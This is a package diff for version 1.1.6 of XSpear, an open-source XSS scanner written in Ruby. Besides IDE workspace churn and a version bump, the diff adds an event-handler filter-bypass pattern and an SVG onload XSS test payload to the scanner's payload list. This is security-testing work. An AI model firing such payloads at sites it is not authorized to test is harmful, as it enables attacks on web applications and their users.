XSpear 1.1.5 → 1.1.6

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: cfc44f2d92f1b26e5d333eeb40c8d6ec91f18acb718a91fa034d3ca69682dbf0
-  data.tar.gz: ac964e34502fd47bad4e4eafa0e7ae58505a67de2f47d2ddce1e2606607570db
+  metadata.gz: 5011ecb6f122ed96cc433874fb2199067b1c699e6e435e4d691d8b0ef887e3d8
+  data.tar.gz: 4789d6740fc2eed284ed82d5af26cf399dc8f787a88ae4be34c3330a9205e322
 SHA512:
-  metadata.gz: 54837391e4c4da2517b10248cbdcb537745830ae213e8c131db450de1e5d97dd6576e15f4e76f43fd2d0f1f53f73d4b37a2c6f7521b4dff6460b9c2bb9646a74
-  data.tar.gz: 794f40198ac102353e135e30f1363af28b139c531bf1bc7da4286223230d38d9b9fa1e8d46b0371c42d50f592e763d5e4eceeb4fd44dc1ae68815df8492e8f29
+  metadata.gz: '09b3602b977bc921d6e5e5da1c6d75ead824d0eae63775462b964ef7c54e6060765914c6f82c5fe10f4b5276c717889882e8dd13e2941663ee771f78ea3494cc'
+  data.tar.gz: eb25a303b66f034bad37f77dc1c89726867bea41045f7c5a119bc99fba4602e97ce91b63eacada0df68cded06c6f0a67c79ec50681583a97f97aded2069ab524

data/.idea/workspace.xml

@@ -1,10 +1,8 @@
 <?xml version="1.0" encoding="UTF-8"?>
 <project version="4">
   <component name="ChangeListManager">
-    <list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
-      <change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
-      <change beforePath="$PROJECT_DIR$/README.md" beforeDir="false" afterPath="$PROJECT_DIR$/README.md" afterDir="false" />
-      <change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
+    <list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="(1.1.6) Add Event handler pattern (whatthe=&quot;&quot;onload)">
+      <change beforePath="$PROJECT_DIR$/exe/XSpear" beforeDir="false" afterPath="$PROJECT_DIR$/exe/XSpear" afterDir="false" />
       <change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
     </list>
     <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
@@ -19,10 +17,19 @@
   <component name="FileEditorManager">
     <leaf SIDE_TABS_SIZE_LIMIT_KEY="300">
       <file pinned="false" current-in-tab="true">
+        <entry file="file://$PROJECT_DIR$/exe/XSpear">
+          <provider selected="true" editor-type-id="text-editor">
+            <state relative-caret-position="466">
+              <caret line="79" column="12" lean-forward="true" selection-start-line="79" selection-start-column="12" selection-end-line="79" selection-end-column="12" />
+            </state>
+          </provider>
+        </entry>
+      </file>
+      <file pinned="false" current-in-tab="false">
         <entry file="file://$PROJECT_DIR$/README.md">
           <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
             <state split_layout="SPLIT">
-              <first_editor relative-caret-position="180">
+              <first_editor relative-caret-position="179">
                 <caret line="12" column="72" selection-start-line="12" selection-start-column="72" selection-end-line="12" selection-end-column="72" />
               </first_editor>
               <second_editor />
@@ -33,8 +40,8 @@
       <file pinned="false" current-in-tab="false">
         <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
           <provider selected="true" editor-type-id="text-editor">
-            <state relative-caret-position="134">
-              <caret line="76" column="9" lean-forward="true" selection-start-line="76" selection-start-column="9" selection-end-line="76" selection-end-column="9" />
+            <state relative-caret-position="360">
+              <caret line="526" selection-start-line="526" selection-end-line="526" />
             </state>
           </provider>
         </entry>
@@ -57,15 +64,6 @@
           </provider>
         </entry>
       </file>
-      <file pinned="false" current-in-tab="false">
-        <entry file="file://$PROJECT_DIR$/lib/XSpear/banner.rb">
-          <provider selected="true" editor-type-id="text-editor">
-            <state relative-caret-position="150">
-              <caret line="10" column="35" selection-start-line="10" selection-start-column="35" selection-end-line="10" selection-end-column="35" />
-            </state>
-          </provider>
-        </entry>
-      </file>
       <file pinned="false" current-in-tab="false">
         <entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
           <provider selected="true" editor-type-id="text-editor">
@@ -113,12 +111,12 @@
       <list>
         <option value="$PROJECT_DIR$/lib/XSpear/log.rb" />
         <option value="$PROJECT_DIR$/XSpear.gemspec" />
-        <option value="$PROJECT_DIR$/exe/XSpear" />
         <option value="$PROJECT_DIR$/lib/XSpear/banner.rb" />
         <option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
+        <option value="$PROJECT_DIR$/README.md" />
         <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
         <option value="$PROJECT_DIR$/lib/XSpear.rb" />
-        <option value="$PROJECT_DIR$/README.md" />
+        <option value="$PROJECT_DIR$/exe/XSpear" />
       </list>
     </option>
   </component>
@@ -235,28 +233,7 @@
       <workItem from="1563809961097" duration="4237000" />
       <workItem from="1563893538891" duration="11917000" />
       <workItem from="1564151699165" duration="2494000" />
-      <workItem from="1564413097342" duration="8852000" />
-    </task>
-    <task id="LOCAL-00009" summary="Edit readme">
-      <created>1563202605282</created>
-      <option name="number" value="00009" />
-      <option name="presentableId" value="LOCAL-00009" />
-      <option name="project" value="LOCAL" />
-      <updated>1563202605282</updated>
-    </task>
-    <task id="LOCAL-00010" summary="Edit readme">
-      <created>1563202838235</created>
-      <option name="number" value="00010" />
-      <option name="presentableId" value="LOCAL-00010" />
-      <option name="project" value="LOCAL" />
-      <updated>1563202838235</updated>
-    </task>
-    <task id="LOCAL-00011" summary="Edit readme">
-      <created>1563203220735</created>
-      <option name="number" value="00011" />
-      <option name="presentableId" value="LOCAL-00011" />
-      <option name="project" value="LOCAL" />
-      <updated>1563203220735</updated>
+      <workItem from="1564413097342" duration="9628000" />
     </task>
     <task id="LOCAL-00012" summary="Add json report and new build binary, edit readme">
       <created>1563293661569</created>
@@ -580,11 +557,32 @@
       <option name="project" value="LOCAL" />
       <updated>1565283263992</updated>
     </task>
-    <option name="localTasksCounter" value="58" />
+    <task id="LOCAL-00058" summary="(1.1.5)(Fixed #21) not reflected params , no testing. but alway blind xss, other bug fix">
+      <created>1565795156071</created>
+      <option name="number" value="00058" />
+      <option name="presentableId" value="LOCAL-00058" />
+      <option name="project" value="LOCAL" />
+      <updated>1565795156071</updated>
+    </task>
+    <task id="LOCAL-00059" summary="(1.1.5) Released 1.1.5">
+      <created>1565795193246</created>
+      <option name="number" value="00059" />
+      <option name="presentableId" value="LOCAL-00059" />
+      <option name="project" value="LOCAL" />
+      <updated>1565795193247</updated>
+    </task>
+    <task id="LOCAL-00060" summary="(1.1.6) Add Event handler pattern (whatthe=&quot;&quot;onload)">
+      <created>1565965741653</created>
+      <option name="number" value="00060" />
+      <option name="presentableId" value="LOCAL-00060" />
+      <option name="project" value="LOCAL" />
+      <updated>1565965741653</updated>
+    </task>
+    <option name="localTasksCounter" value="61" />
     <servers />
   </component>
   <component name="TimeTrackingManager">
-    <option name="totallyTimeSpent" value="47822000" />
+    <option name="totallyTimeSpent" value="48598000" />
   </component>
   <component name="TodoView">
     <todo-panel id="selected-file">
@@ -599,7 +597,7 @@
     <frame x="-1920" y="-643" width="1920" height="1080" extended-state="0" />
     <editor active="true" />
     <layout>
-      <window_info content_ui="combo" id="Project" order="0" visible="true" weight="0.14643237" />
+      <window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.14643237" />
       <window_info id="Structure" order="1" side_tool="true" weight="0.25" />
       <window_info id="Favorites" order="2" side_tool="true" />
       <window_info anchor="bottom" id="Message" order="0" />
@@ -612,7 +610,7 @@
       <window_info anchor="bottom" id="Docker" order="7" show_stripe_button="false" />
       <window_info anchor="bottom" id="Database Changes" order="8" />
       <window_info anchor="bottom" id="Version Control" order="9" />
-      <window_info active="true" anchor="bottom" id="Terminal" order="10" visible="true" weight="0.34059405" />
+      <window_info anchor="bottom" id="Terminal" order="10" visible="true" weight="0.34059405" />
       <window_info anchor="bottom" id="Event Log" order="11" side_tool="true" />
       <window_info anchor="bottom" id="Messages" order="12" weight="0.32953367" />
       <window_info anchor="right" id="Commander" internal_type="SLIDING" order="0" type="SLIDING" weight="0.4" />
@@ -625,9 +623,6 @@
     <option name="version" value="1" />
   </component>
   <component name="VcsManagerConfiguration">
-    <MESSAGE value="(1.0.6)[fixed #4] Report 객체 수정" />
-    <MESSAGE value="(1.0.6)[fixed #8] Added response header analysis module" />
-    <MESSAGE value="(1.0.6)[fixed #9] Added method in report-cli" />
     <MESSAGE value="(1.0.6) Edit report &amp; scanning format" />
     <MESSAGE value="(1.0.6)[fixed #5] Add blind-xss other pattern" />
     <MESSAGE value="(1.0.6) Releases 1.0.6 version" />
@@ -650,7 +645,10 @@
     <MESSAGE value="(1.1.4) [Fixed #20 #22] Modified JSON Format&amp;Remove Color in XSpearReporter" />
     <MESSAGE value="(1.1.4) [Fixed #19] Add http.code, message log, edit log format on verbose=3" />
     <MESSAGE value="(1.1.4) Released 1.1.4" />
-    <option name="LAST_COMMIT_MESSAGE" value="(1.1.4) Released 1.1.4" />
+    <MESSAGE value="(1.1.5)(Fixed #21) not reflected params , no testing. but alway blind xss, other bug fix" />
+    <MESSAGE value="(1.1.5) Released 1.1.5" />
+    <MESSAGE value="(1.1.6) Add Event handler pattern (whatthe=&quot;&quot;onload)" />
+    <option name="LAST_COMMIT_MESSAGE" value="(1.1.6) Add Event handler pattern (whatthe=&quot;&quot;onload)" />
   </component>
   <component name="editorHistoryManager">
     <entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
@@ -666,13 +664,6 @@
     <entry file="file://$PROJECT_DIR$/bin/setup">
       <provider selected="true" editor-type-id="text-editor" />
     </entry>
-    <entry file="file://$PROJECT_DIR$/exe/XSpear">
-      <provider selected="true" editor-type-id="text-editor">
-        <state relative-caret-position="570">
-          <caret line="38" column="77" selection-start-line="38" selection-start-column="77" selection-end-line="38" selection-end-column="77" />
-        </state>
-      </provider>
-    </entry>
     <entry file="file://$PROJECT_DIR$/spec/XSpear_spec.rb">
       <provider selected="true" editor-type-id="text-editor" />
     </entry>
@@ -717,6 +708,16 @@
         </state>
       </provider>
     </entry>
+    <entry file="file://$PROJECT_DIR$/README.md">
+      <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
+        <state split_layout="SPLIT">
+          <first_editor relative-caret-position="179">
+            <caret line="12" column="72" selection-start-line="12" selection-start-column="72" selection-end-line="12" selection-end-column="72" />
+          </first_editor>
+          <second_editor />
+        </state>
+      </provider>
+    </entry>
     <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
       <provider selected="true" editor-type-id="text-editor">
         <state relative-caret-position="15">
@@ -726,18 +727,15 @@
     </entry>
     <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
       <provider selected="true" editor-type-id="text-editor">
-        <state relative-caret-position="134">
-          <caret line="76" column="9" lean-forward="true" selection-start-line="76" selection-start-column="9" selection-end-line="76" selection-end-column="9" />
+        <state relative-caret-position="360">
+          <caret line="526" selection-start-line="526" selection-end-line="526" />
         </state>
       </provider>
     </entry>
-    <entry file="file://$PROJECT_DIR$/README.md">
-      <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
-        <state split_layout="SPLIT">
-          <first_editor relative-caret-position="180">
-            <caret line="12" column="72" selection-start-line="12" selection-start-column="72" selection-end-line="12" selection-end-column="72" />
-          </first_editor>
-          <second_editor />
+    <entry file="file://$PROJECT_DIR$/exe/XSpear">
+      <provider selected="true" editor-type-id="text-editor">
+        <state relative-caret-position="466">
+          <caret line="79" column="12" lean-forward="true" selection-start-line="79" selection-start-column="12" selection-end-line="79" selection-end-column="12" />
         </state>
       </provider>
     </entry>

data/README.md

@@ -331,5 +331,9 @@ The gem is available as open source under the terms of the [MIT License](https:/
 Everyone interacting in the XSpear project’s codebases, issue trackers, chat rooms and mailing lists is expected to follow the [code of conduct](https://github.com/[USERNAME]/XSpear/blob/master/CODE_OF_CONDUCT.md).
 
 ## ScreenShot
-<img src="https://user-images.githubusercontent.com/13212227/61727892-1681d400-adaf-11e9-832d-37547006f778.png" width=100%>
-<img src="https://user-images.githubusercontent.com/13212227/61311071-8b459300-a830-11e9-8e60-c08e984fdacb.png" width=100%>
+< CLI-Report 1 >
+<img src="https://user-images.githubusercontent.com/13212227/63032408-b800cf00-bef0-11e9-8a7a-4325eecae486.png" width=100%>
+< CLI-Report 2 >
+<img src="https://user-images.githubusercontent.com/13212227/63032409-b8996580-bef0-11e9-93cd-dbabbd5f4ea1.png" width=100%>
+< JSON Report >
+<img src="https://user-images.githubusercontent.com/13212227/63032411-b8996580-bef0-11e9-8aee-0b80fe87f50d.png" width=100%>

data/exe/XSpear

@@ -13,7 +13,7 @@ class Parser
       exit
     end
     opt_parser = OptionParser.new do |opts|
-      opts.banner = "Usage: xspear -u [target] -[options] [value]\n[ e.g ]\n$ ruby a.rb -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'\n\n[ Options ]"
+      opts.banner = "Usage: xspear -u [target] -[options] [value]\n[ e.g ]\n$ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'\n\n[ Options ]"
 
 
       opts.on('-u', '--url=target_URL', '[required] Target Url') do |n|
@@ -79,7 +79,7 @@ class Parser
         puts XSpear::VERSION
         exit
       end
-      opts.on('--update', 'Update with online') do
+      opts.on('--update', 'Show how to update') do
         puts "[RubyGem user]               : $ gem update XSpear"
         puts "[Soft | Developer & Git clone user] : $ git pull -v "
         puts "[Hard | Developer & Git clone user] : $ git reset --hard HEAD; git pull -v "

data/lib/XSpear.rb

@@ -367,7 +367,8 @@ class XspearScan
         'onpointerout',
         'onpointerup',
         'onloadstart',
-        'onloadend'
+        'onloadend',
+        'whatthe=""onload'
     ]
     tags = [
         "script",
@@ -521,6 +522,7 @@ class XspearScan
     r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert(45)">', '<details/open/ontoggle="alert(45)">', 'h', "triggered ".yellow+"<details/open/ontoggle=\"alert(45)\">".red, CallbackXSSSelenium)
     r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'h', "triggered ".yellow+"<audio src onloadstart=alert(45)>".red, CallbackXSSSelenium)
     r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "triggered ".yellow+"<marquee onstart=alert(45)>".red, CallbackXSSSelenium)
+    r.push makeQueryPattern('x', '"\'><svg/whatthe=""onload=alert(45)>', '<svg/whatthe=""onload=alert(45)>', 'h', "triggered ".yellow+"<svg/whatthe=""onload=alert(45)>".red, CallbackXSSSelenium)
 
 
     # Check Selenium XSS Polyglot

data/lib/XSpear/version.rb

@@ -1,3 +1,3 @@
 module XSpear
-  VERSION = "1.1.5"
+  VERSION = "1.1.6"
 end

metadata

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: XSpear
 version: !ruby/object:Gem::Version
-  version: 1.1.5
+  version: 1.1.6
 platform: ruby
 authors:
 - hahwul
 autorequire: 
 bindir: exe
 cert_chain: []
-date: 2019-08-14 00:00:00.000000000 Z
+date: 2019-08-16 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: colorize